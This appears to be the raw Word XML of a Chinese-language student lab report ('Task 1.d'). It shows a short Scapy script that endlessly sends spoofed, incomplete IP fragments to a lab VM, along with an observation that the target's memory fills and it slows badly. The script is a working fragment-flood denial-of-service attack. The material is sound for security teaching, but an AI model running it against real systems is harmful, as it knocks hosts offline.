    <w:p w14:paraId="1131FD9B" w14:textId="780FA772" w:rsidR="0040123E" w:rsidRPr="00B527E9" w:rsidRDefault="0040123E" w:rsidP="0040123E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B527E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r w:rsidRPr="00B527E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00B527E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3605625A" w14:textId="4633526B" w:rsidR="0040123E" w:rsidRDefault="0040123E" w:rsidP="0040123E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFB633C" w14:textId="6F94AEDE" w:rsidR="0040123E" w:rsidRPr="0040123E" w:rsidRDefault="0040123E" w:rsidP="0040123E">
      <w:r w:rsidRPr="0040123E">
        <w:t xml:space="preserve">#!/usr/bin/python3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161AB10B" w14:textId="77777777" w:rsidR="0040123E" w:rsidRPr="0040123E" w:rsidRDefault="0040123E" w:rsidP="0040123E">
      <w:r w:rsidRPr="0040123E">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0040123E">
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0040123E">
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1906A7F9" w14:textId="77777777" w:rsidR="0040123E" w:rsidRPr="0040123E" w:rsidRDefault="0040123E" w:rsidP="0040123E"/>
    <w:p w14:paraId="2F66BF0B" w14:textId="77777777" w:rsidR="0040123E" w:rsidRPr="0040123E" w:rsidRDefault="0040123E" w:rsidP="0040123E">
      <w:r w:rsidRPr="0040123E">
        <w:t>while 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BBDCB2" w14:textId="77777777" w:rsidR="0040123E" w:rsidRPr="0040123E" w:rsidRDefault="0040123E" w:rsidP="0040123E">
      <w:r w:rsidRPr="0040123E">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0040123E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0040123E">
        <w:t xml:space="preserve"> = IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0040123E">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0040123E">
        <w:t xml:space="preserve">="192.168.19.143", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0040123E">
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0040123E">
        <w:t xml:space="preserve">="192.168.19.144",id=1000,frag=0,flags=1) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290E4805" w14:textId="77777777" w:rsidR="0040123E" w:rsidRPr="0040123E" w:rsidRDefault="0040123E" w:rsidP="0040123E">
      <w:r w:rsidRPr="0040123E">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0040123E">
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0040123E">
        <w:t xml:space="preserve"> = UDP(sport=7070, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0040123E">
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0040123E">
        <w:t xml:space="preserve">=9090,len=104,chksum=0)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EDB9DD" w14:textId="77777777" w:rsidR="0040123E" w:rsidRPr="0040123E" w:rsidRDefault="0040123E" w:rsidP="0040123E">
      <w:r w:rsidRPr="0040123E">
        <w:tab/>
        <w:t>payload = 'A' * 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72002926" w14:textId="77777777" w:rsidR="0040123E" w:rsidRPr="0040123E" w:rsidRDefault="0040123E" w:rsidP="0040123E">
      <w:r w:rsidRPr="0040123E">
        <w:tab/>
        <w:t xml:space="preserve">pkt = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0040123E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0040123E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0040123E">
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0040123E">
        <w:t>/payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304EB1CA" w14:textId="036AB6C7" w:rsidR="0040123E" w:rsidRDefault="0040123E" w:rsidP="0040123E">
      <w:r w:rsidRPr="0040123E">
        <w:tab/>
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF2996E" w14:textId="70928ECF" w:rsidR="009118DD" w:rsidRDefault="009118DD" w:rsidP="0040123E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="417D928F" wp14:editId="7CB395FB">
            <wp:extent cx="5274310" cy="28663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7EA4" w14:textId="4029DEED" w:rsidR="009118DD" w:rsidRPr="0040123E" w:rsidRDefault="009118DD" w:rsidP="0040123E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当内存被大量占用时，感受到虚拟机出现明显卡顿，无法正常使用。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009118DD" w:rsidRPr="00401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3602C" w14:textId="77777777" w:rsidR="00566C3E" w:rsidRDefault="00566C3E" w:rsidP="00C51908">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="62A74714" w14:textId="77777777" w:rsidR="00566C3E" w:rsidRDefault="00566C3E" w:rsidP="00C51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97145" w14:textId="77777777" w:rsidR="00566C3E" w:rsidRDefault="00566C3E" w:rsidP="00C51908">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="30FDA0F3" w14:textId="77777777" w:rsidR="00566C3E" w:rsidRDefault="00566C3E" w:rsidP="00C519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92562"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD282704"/>
    <w:lvl w:ilvl="0" w:tplc="C27C82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E328E6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="534AD5A2"/>
    <w:lvl w:ilvl="0" w:tplc="F6A492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CF007A0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8B8ECEA"/>
    <w:lvl w:ilvl="0" w:tplc="DD4E9D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86A"/>
    <w:rsid w:val="00031460"/>
    <w:rsid w:val="00074D21"/>
    <w:rsid w:val="000B534D"/>
    <w:rsid w:val="00114295"/>
    <w:rsid w:val="001F4A28"/>
    <w:rsid w:val="00226B27"/>
    <w:rsid w:val="0023565F"/>
    <w:rsid w:val="00252F92"/>
    <w:rsid w:val="00261CC7"/>
    <w:rsid w:val="00266ED3"/>
    <w:rsid w:val="00271210"/>
    <w:rsid w:val="002D7D04"/>
    <w:rsid w:val="00306F2D"/>
    <w:rsid w:val="0032339C"/>
    <w:rsid w:val="0033484C"/>
    <w:rsid w:val="00344969"/>
    <w:rsid w:val="00383334"/>
    <w:rsid w:val="00390B5D"/>
    <w:rsid w:val="003910C2"/>
    <w:rsid w:val="003E2B80"/>
    <w:rsid w:val="0040123E"/>
    <w:rsid w:val="00411EAC"/>
    <w:rsid w:val="00413367"/>
    <w:rsid w:val="00474FF1"/>
    <w:rsid w:val="004A398F"/>
    <w:rsid w:val="004C6F9E"/>
    <w:rsid w:val="004D50FE"/>
    <w:rsid w:val="00527933"/>
    <w:rsid w:val="00566C3E"/>
    <w:rsid w:val="00586290"/>
    <w:rsid w:val="005B1B3F"/>
    <w:rsid w:val="006540EA"/>
    <w:rsid w:val="0067699E"/>
    <w:rsid w:val="006F46B8"/>
    <w:rsid w:val="007007B4"/>
    <w:rsid w:val="007119B4"/>
    <w:rsid w:val="0072386A"/>
    <w:rsid w:val="0077087C"/>
    <w:rsid w:val="00794353"/>
    <w:rsid w:val="007A5DC7"/>
    <w:rsid w:val="007B5106"/>
    <w:rsid w:val="00816CBB"/>
    <w:rsid w:val="00827D9C"/>
    <w:rsid w:val="00846D29"/>
    <w:rsid w:val="008504E6"/>
    <w:rsid w:val="00897F52"/>
    <w:rsid w:val="009118DD"/>
    <w:rsid w:val="00926B71"/>
    <w:rsid w:val="009819B1"/>
    <w:rsid w:val="009B4AC6"/>
    <w:rsid w:val="009D1EA0"/>
    <w:rsid w:val="009D27BA"/>
    <w:rsid w:val="00AA69D5"/>
    <w:rsid w:val="00AC03AB"/>
    <w:rsid w:val="00AD6DE8"/>
    <w:rsid w:val="00B527E9"/>
    <w:rsid w:val="00B902DB"/>
    <w:rsid w:val="00BA5145"/>
    <w:rsid w:val="00C0589D"/>
    <w:rsid w:val="00C07DF8"/>
    <w:rsid w:val="00C37630"/>
    <w:rsid w:val="00C51908"/>
    <w:rsid w:val="00CA5B3E"/>
    <w:rsid w:val="00D85ACB"/>
    <w:rsid w:val="00D87386"/>
    <w:rsid w:val="00D945E2"/>
    <w:rsid w:val="00D95668"/>
    <w:rsid w:val="00E07408"/>
    <w:rsid w:val="00E532EE"/>
    <w:rsid w:val="00EA6FC4"/>
    <w:rsid w:val="00EC0CC8"/>
    <w:rsid w:val="00EE1E70"/>
    <w:rsid w:val="00EE7382"/>
    <w:rsid w:val="00F238E0"/>
    <w:rsid w:val="00F34B64"/>
    <w:rsid w:val="00F96629"/>
    <w:rsid w:val="00FA765F"/>
    <w:rsid w:val="00FE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7BBE7A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6FFEE3DE-B69C-4223-8A1A-E67D14C8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484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2339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2339C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C519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519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519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519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3559</TotalTime>
  <Pages>14</Pages>
  <Words>902</Words>
  <Characters>5143</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>42</Lines>
  <Paragraphs>12</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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XT</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>R XT</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-02T12:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-11T02:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>